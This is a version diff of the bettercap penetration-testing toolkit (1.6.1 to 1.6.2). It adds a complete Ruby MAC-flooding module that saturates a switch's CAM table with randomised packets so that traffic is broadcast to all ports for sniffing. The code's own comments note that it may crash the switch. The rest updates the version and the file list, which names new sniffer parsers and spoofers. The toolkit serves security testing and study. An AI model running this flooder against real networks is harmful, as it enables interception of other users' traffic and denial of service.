bettercap 1.6.1 → 1.6.2

data/lib/bettercap/spoofers/mac.rb

@@ -0,0 +1,126 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+MAC spoofer:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Spoofers
+#
+# This class is responsible for performing MAC address flooding on the network.
+#
+# This spoofer continuously floods the network with empty TCP
+# packets with randomised source and destination MAC addresses
+# to fill the switch's Content Addressable Memory (CAM) table.
+#
+# If the network switch is vulnerable, no new MAC addresses
+# will be learned, causing the switch to fail open and broadcast
+# traffic out on all ports.
+#
+# This spoofer does not facilitate Man-in-the-Middle attacks,
+# however, if successful, will allow the sniffer to view packets
+# destined for any network port on the switch.
+#
+# Note: this spoofer may crash the switch,
+#       resulting in denial of service.
+#
+# References:
+# - https://en.wikipedia.org/wiki/MAC_flooding
+# - https://en.wikipedia.org/wiki/Forwarding_information_base
+# - http://www.ciscopress.com/articles/article.asp?p=1681033&seqNum=2
+#
+class MAC < Base
+  # Initialize the BetterCap::Spoofers::MAC object.
+  def initialize
+    @ctx          = Context.get
+    @flood_thread = nil
+    @running      = false
+
+    update_gateway!
+  end
+
+  # Start the MAC spoofing
+  def start
+    Logger.debug 'Starting MAC spoofer ...'
+
+    stop() if @running
+    @running = true
+
+    @flood_thread = Thread.new { mac_flood }
+  end
+
+  # Stop the MAC spoofing
+  def stop
+    raise 'MAC spoofer is not running' unless @running
+
+    Logger.debug 'Stopping MAC spoofer ...'
+
+    @running = false
+    begin
+      @flood_thread.exit
+    rescue
+    end
+  end
+
+  private
+
+  # Main spoofer loop
+  def mac_flood
+    while true
+      send_tcp_pkt rand_rfc1918_ip, rand_mac, rand_rfc1918_ip, rand_mac
+    end
+  end
+
+  # Generate a random MAC address
+  def rand_mac
+    [format('%0.2x', rand(256) & ~1), (1..5).map { format('%0.2x', rand(256)) }].join(':')
+  end
+
+  # Generate a random RFC1918 IP address
+  def rand_rfc1918_ip
+    case rand(3)
+    when 0
+      ip = ['10', (0...256).to_a.sample, (0...256).to_a.sample, (1...256).to_a.sample]
+    when 1
+      ip = ['172', (16...32).to_a.sample, (0...256).to_a.sample, (1...256).to_a.sample]
+    when 2
+      ip = ['192', '168', (0...256).to_a.sample, (1...256).to_a.sample]
+    end
+    ip.join('.')
+  end
+
+  # Generate a random port above 1024
+  def rand_port
+    (rand((2 ** 16) - 1024) + 1024).to_i
+  end
+
+  # Send an empty TCP packet from +saddr+ IP address to +daddr+ IP address
+  # with +smac+ source MAC address and +dmac+ destination MAC address.
+  def send_tcp_pkt(saddr, smac, daddr, dmac)
+    pkt = PacketFu::TCPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+
+    pkt.ip_saddr = saddr
+    pkt.ip_daddr = daddr
+    pkt.ip_recalc
+
+    pkt.tcp_src = rand_port
+    pkt.tcp_dst = rand_port
+
+    @ctx.packets.push(pkt)
+  end
+end
+end
+end

data/lib/bettercap/version.rb

@@ -12,7 +12,7 @@ This project is released under the GPL 3 license.
 =end
 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.6.1'
+  VERSION = '1.6.2'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.6.1
+  version: 1.6.2
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2017-06-29 00:00:00.000000000 Z
+date: 2017-08-21 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -168,8 +168,11 @@ files:
 - lib/bettercap/discovery/agents/arp.rb
 - lib/bettercap/discovery/agents/base.rb
 - lib/bettercap/discovery/agents/icmp.rb
+- lib/bettercap/discovery/agents/mdns.rb
 - lib/bettercap/discovery/agents/ndp.rb
 - lib/bettercap/discovery/agents/udp.rb
+- lib/bettercap/discovery/agents/upnp.rb
+- lib/bettercap/discovery/agents/wsd.rb
 - lib/bettercap/discovery/thread.rb
 - lib/bettercap/error.rb
 - lib/bettercap/firewalls/base.rb
@@ -231,12 +234,15 @@ files:
 - lib/bettercap/proxy/udp/pool.rb
 - lib/bettercap/proxy/udp/proxy.rb
 - lib/bettercap/shell.rb
+- lib/bettercap/sniffer/parsers/asterisk.rb
 - lib/bettercap/sniffer/parsers/base.rb
+- lib/bettercap/sniffer/parsers/bfd.rb
 - lib/bettercap/sniffer/parsers/cookie.rb
 - lib/bettercap/sniffer/parsers/custom.rb
 - lib/bettercap/sniffer/parsers/dhcp.rb
 - lib/bettercap/sniffer/parsers/dict.rb
 - lib/bettercap/sniffer/parsers/ftp.rb
+- lib/bettercap/sniffer/parsers/hsrp.rb
 - lib/bettercap/sniffer/parsers/httpauth.rb
 - lib/bettercap/sniffer/parsers/https.rb
 - lib/bettercap/sniffer/parsers/irc.rb
@@ -247,17 +253,22 @@ files:
 - lib/bettercap/sniffer/parsers/ntlmss.rb
 - lib/bettercap/sniffer/parsers/pgsql.rb
 - lib/bettercap/sniffer/parsers/post.rb
+- lib/bettercap/sniffer/parsers/radius.rb
 - lib/bettercap/sniffer/parsers/redis.rb
 - lib/bettercap/sniffer/parsers/rlogin.rb
 - lib/bettercap/sniffer/parsers/snmp.rb
 - lib/bettercap/sniffer/parsers/snpp.rb
+- lib/bettercap/sniffer/parsers/teamtalk.rb
 - lib/bettercap/sniffer/parsers/teamviewer.rb
 - lib/bettercap/sniffer/parsers/url.rb
 - lib/bettercap/sniffer/parsers/whatsapp.rb
+- lib/bettercap/sniffer/parsers/wol.rb
 - lib/bettercap/sniffer/sniffer.rb
 - lib/bettercap/spoofers/arp.rb
 - lib/bettercap/spoofers/base.rb
+- lib/bettercap/spoofers/hsrp.rb
 - lib/bettercap/spoofers/icmp.rb
+- lib/bettercap/spoofers/mac.rb
 - lib/bettercap/spoofers/ndp.rb
 - lib/bettercap/spoofers/none.rb
 - lib/bettercap/update_checker.rb